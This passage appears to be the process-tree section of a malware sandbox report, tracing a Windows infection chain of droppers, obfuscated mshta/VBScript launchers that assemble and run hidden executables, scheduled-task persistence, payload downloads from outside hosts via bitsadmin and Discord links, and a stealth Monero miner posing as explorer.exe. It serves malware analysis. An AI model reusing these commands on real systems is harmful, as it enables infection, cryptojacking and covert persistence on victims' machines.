C:\Users\Admin\Pictures\Adobe Films\AWsRNaMCHkkLFW_EvKfD48ps.exe"C:\Users\Admin\Pictures\Adobe Films\AWsRNaMCHkkLFW_EvKfD48ps.exe"7⤵PID:3616
-
-
-
C:\Users\Admin\Pictures\Adobe Films\x17sNzpvs4RYJwvJH0r8AUyp.exe"C:\Users\Admin\Pictures\Adobe Films\x17sNzpvs4RYJwvJH0r8AUyp.exe"6⤵PID:5712
-
C:\Users\Admin\Documents\Yx73jWn8tiDjpA9edan3_yIH.exe"C:\Users\Admin\Documents\Yx73jWn8tiDjpA9edan3_yIH.exe"7⤵PID:6488
-
C:\Users\Admin\Pictures\Adobe Films\UPk9W6Mutc6xDMeNBuRsKHUt.exe"C:\Users\Admin\Pictures\Adobe Films\UPk9W6Mutc6xDMeNBuRsKHUt.exe"8⤵
- Loads dropped DLL
PID:4216
-
-
C:\Users\Admin\Pictures\Adobe Films\mTTGejk4b48HIX44RTUd6pFp.exe"C:\Users\Admin\Pictures\Adobe Films\mTTGejk4b48HIX44RTUd6pFp.exe"8⤵PID:4944
-
-
C:\Users\Admin\Pictures\Adobe Films\in13xwSLOyF078qHtCDndE5E.exe"C:\Users\Admin\Pictures\Adobe Films\in13xwSLOyF078qHtCDndE5E.exe"8⤵PID:3788
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:4144
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:3300
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gF5YCPRiJoqELAdvF4RYsiCh.exe"C:\Users\Admin\Pictures\Adobe Films\gF5YCPRiJoqELAdvF4RYsiCh.exe"8⤵PID:6584
-
-
C:\Users\Admin\Pictures\Adobe Films\QhUoYuMjKhQZe5S5tOC2_RxJ.exe"C:\Users\Admin\Pictures\Adobe Films\QhUoYuMjKhQZe5S5tOC2_RxJ.exe"8⤵PID:6892
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\QhUoYuMjKhQZe5S5tOC2_RxJ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\QhUoYuMjKhQZe5S5tOC2_RxJ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:4284
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\QhUoYuMjKhQZe5S5tOC2_RxJ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\QhUoYuMjKhQZe5S5tOC2_RxJ.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵PID:6592
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵PID:6448
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:3332
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵PID:7088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:6128
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:6784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:2144
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵PID:4180
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "QhUoYuMjKhQZe5S5tOC2_RxJ.exe"11⤵
- Kills process with taskkill
PID:1508
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\F9nZcig6bnYNA9bGnBbCpdjZ.exe"C:\Users\Admin\Pictures\Adobe Films\F9nZcig6bnYNA9bGnBbCpdjZ.exe"8⤵PID:6676
-
-
C:\Users\Admin\Pictures\Adobe Films\HHEWEB3ov6jGwnrvTjcpFrSZ.exe"C:\Users\Admin\Pictures\Adobe Films\HHEWEB3ov6jGwnrvTjcpFrSZ.exe"8⤵
- Executes dropped EXE
PID:3116 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵PID:980
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"10⤵PID:7648
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1cc,0x1d0,0x198,0x1d4,0x7ffdd598dec0,0x7ffdd598ded0,0x7ffdd598dee011⤵PID:2784
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,17094125198740621410,14836402986149237641,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7648_1296002921" --mojo-platform-channel-handle=1664 /prefetch:811⤵PID:7572
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rFkZhtEqKCXuo0CSVg_HKngd.exe"C:\Users\Admin\Pictures\Adobe Films\rFkZhtEqKCXuo0CSVg_HKngd.exe"8⤵PID:6200
-
C:\Users\Admin\Pictures\Adobe Films\rFkZhtEqKCXuo0CSVg_HKngd.exe"C:\Users\Admin\Pictures\Adobe Films\rFkZhtEqKCXuo0CSVg_HKngd.exe" -u9⤵PID:5036
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SW7ZEVz7ERAHM7AyOM1jTEFn.exe"C:\Users\Admin\Pictures\Adobe Films\SW7ZEVz7ERAHM7AyOM1jTEFn.exe"8⤵PID:6532
-
C:\Users\Admin\AppData\Local\Temp\is-2L0H4.tmp\SW7ZEVz7ERAHM7AyOM1jTEFn.tmp"C:\Users\Admin\AppData\Local\Temp\is-2L0H4.tmp\SW7ZEVz7ERAHM7AyOM1jTEFn.tmp" /SL5="$702EA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\SW7ZEVz7ERAHM7AyOM1jTEFn.exe"9⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\is-H4CD2.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-H4CD2.tmp\DYbALA.exe" /S /UID=270910⤵PID:2644
-
C:\Program Files\Microsoft Office\AAODXWGCJW\foldershare.exe"C:\Program Files\Microsoft Office\AAODXWGCJW\foldershare.exe" /VERYSILENT11⤵PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\99-0f4ac-828-9e4b5-2a3a9b259aa87\Nyxakazhuki.exe"C:\Users\Admin\AppData\Local\Temp\99-0f4ac-828-9e4b5-2a3a9b259aa87\Nyxakazhuki.exe"11⤵PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\dc-77d3a-13d-15890-5379477544f81\Gaemoruweve.exe"C:\Users\Admin\AppData\Local\Temp\dc-77d3a-13d-15890-5379477544f81\Gaemoruweve.exe"11⤵PID:804
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\acp5f2rq.re5\GcleanerEU.exe /eufive & exit12⤵PID:2784
-
C:\Users\Admin\AppData\Local\Temp\acp5f2rq.re5\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\acp5f2rq.re5\GcleanerEU.exe /eufive13⤵PID:7480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\avoodvvb.fb3\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\avoodvvb.fb3\installer.exeC:\Users\Admin\AppData\Local\Temp\avoodvvb.fb3\installer.exe /qn CAMPAIGN="654"13⤵PID:7512
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\avoodvvb.fb3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\avoodvvb.fb3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635537990 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4976
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lb4zmujl.ipp\any.exe & exit12⤵PID:6316
-
C:\Users\Admin\AppData\Local\Temp\lb4zmujl.ipp\any.exeC:\Users\Admin\AppData\Local\Temp\lb4zmujl.ipp\any.exe13⤵PID:7568
-
C:\Users\Admin\AppData\Local\Temp\lb4zmujl.ipp\any.exe"C:\Users\Admin\AppData\Local\Temp\lb4zmujl.ipp\any.exe" -u14⤵PID:7988
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j4ankepq.qkk\gcleaner.exe /mixfive & exit12⤵PID:7000
-
C:\Users\Admin\AppData\Local\Temp\j4ankepq.qkk\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j4ankepq.qkk\gcleaner.exe /mixfive13⤵PID:7716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nmuu5ajl.iq5\autosubplayer.exe /S & exit12⤵PID:7288
-
C:\Users\Admin\AppData\Local\Temp\nmuu5ajl.iq5\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\nmuu5ajl.iq5\autosubplayer.exe /S13⤵PID:7848
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdF8DB.tmp\tempfile.ps1"14⤵PID:6792
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdF8DB.tmp\tempfile.ps1"14⤵PID:6212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdF8DB.tmp\tempfile.ps1"14⤵PID:4448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdF8DB.tmp\tempfile.ps1"14⤵PID:4820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdF8DB.tmp\tempfile.ps1"14⤵PID:6044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdF8DB.tmp\tempfile.ps1"14⤵PID:1508
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdF8DB.tmp\tempfile.ps1"14⤵PID:4288
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
PID:7948
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2700
-
-
-
C:\Users\Admin\Pictures\Adobe Films\71Ep4nrdPu2lHPIgTbexMXd2.exe"C:\Users\Admin\Pictures\Adobe Films\71Ep4nrdPu2lHPIgTbexMXd2.exe"6⤵PID:2292
-
-
C:\Users\Admin\Pictures\Adobe Films\8kpeoLrqwpW7wAyFyeAmJmFl.exe"C:\Users\Admin\Pictures\Adobe Films\8kpeoLrqwpW7wAyFyeAmJmFl.exe"6⤵
- Executes dropped EXE
PID:636
-
-
C:\Users\Admin\Pictures\Adobe Films\tUyl0wMp4bx287ai4SIUQWG1.exe"C:\Users\Admin\Pictures\Adobe Films\tUyl0wMp4bx287ai4SIUQWG1.exe"6⤵PID:4076
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\demimondaines.vbs"7⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq8⤵PID:2752
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"9⤵PID:4108
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"10⤵PID:6972
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UTiV2t2c7pdf_2LkB9yGtcLw.exe"C:\Users\Admin\Pictures\Adobe Films\UTiV2t2c7pdf_2LkB9yGtcLw.exe"6⤵PID:1532
-
C:\Users\Admin\Pictures\Adobe Films\UTiV2t2c7pdf_2LkB9yGtcLw.exe"C:\Users\Admin\Pictures\Adobe Films\UTiV2t2c7pdf_2LkB9yGtcLw.exe"7⤵PID:5608
-
-
-
C:\Users\Admin\Pictures\Adobe Films\umvNtrC0dDqE5YRW6325nA1q.exe"C:\Users\Admin\Pictures\Adobe Films\umvNtrC0dDqE5YRW6325nA1q.exe"6⤵PID:4988
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1120
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\2F27.bat "C:\Users\Admin\Pictures\Adobe Films\umvNtrC0dDqE5YRW6325nA1q.exe""7⤵PID:4616
-
C:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""8⤵PID:3076
-
-
C:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""8⤵PID:7080
-
-
C:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""8⤵PID:6888
-
-
C:\Users\Admin\AppData\Local\Temp\19662\18.exe18.exe8⤵PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\19662\Transmissibility.exeTransmissibility.exe8⤵PID:6564
-
-
C:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F25.tmp\2F26.tmp\extd.exe "" "" "" "" "" "" "" "" ""8⤵PID:5228
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_n5aIyHCNRQ7KY_tfRUCKqza.exe"C:\Users\Admin\Pictures\Adobe Films\_n5aIyHCNRQ7KY_tfRUCKqza.exe"6⤵PID:5716
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\_n5aIyHCNRQ7KY_tfRUCKqza.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\_n5aIyHCNRQ7KY_tfRUCKqza.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵PID:4160
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\_n5aIyHCNRQ7KY_tfRUCKqza.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\_n5aIyHCNRQ7KY_tfRUCKqza.exe" ) do taskkill -im "%~NxK" -F8⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵PID:2140
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵PID:5304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵PID:6428
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵PID:3076
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵PID:1472
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵PID:6512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵PID:5320
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵PID:6256
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "_n5aIyHCNRQ7KY_tfRUCKqza.exe" -F9⤵
- Kills process with taskkill
PID:6596
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FfE8qHxASqDES4cQHEhP82k6.exe"C:\Users\Admin\Pictures\Adobe Films\FfE8qHxASqDES4cQHEhP82k6.exe"6⤵PID:4080
-
C:\Users\Admin\Pictures\Adobe Films\FfE8qHxASqDES4cQHEhP82k6.exe"C:\Users\Admin\Pictures\Adobe Films\FfE8qHxASqDES4cQHEhP82k6.exe"7⤵PID:5336
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Jc2tUP0a8vwbandWqjVj8EM0.exe"C:\Users\Admin\Pictures\Adobe Films\Jc2tUP0a8vwbandWqjVj8EM0.exe"6⤵PID:6980
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵PID:4260
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"8⤵PID:7668
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x238,0x234,0x230,0x25c,0x22c,0x7ffdd598dec0,0x7ffdd598ded0,0x7ffdd598dee09⤵PID:7356
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0x11c,0xf8,0x7ff75f319e70,0x7ff75f319e80,0x7ff75f319e9010⤵PID:4720
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,9091895256163520203,14703798520890433571,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7668_987576017" --mojo-platform-channel-handle=1628 /prefetch:89⤵PID:4528
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe4⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun0324aba28588c0.exeSun0324aba28588c0.exe5⤵
- Executes dropped EXE
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe4⤵PID:2024
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun0351a0558292.exeSun0351a0558292.exe5⤵
- Executes dropped EXE
PID:2116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe4⤵PID:1756
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe5⤵PID:3684
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3684 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:856
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:7856
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:2988
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:5900
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:368
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:6372
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:6380
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:3080
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:7308
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4132 -
C:\Users\Admin\AppData\Roaming\2078851.exe"C:\Users\Admin\AppData\Roaming\2078851.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
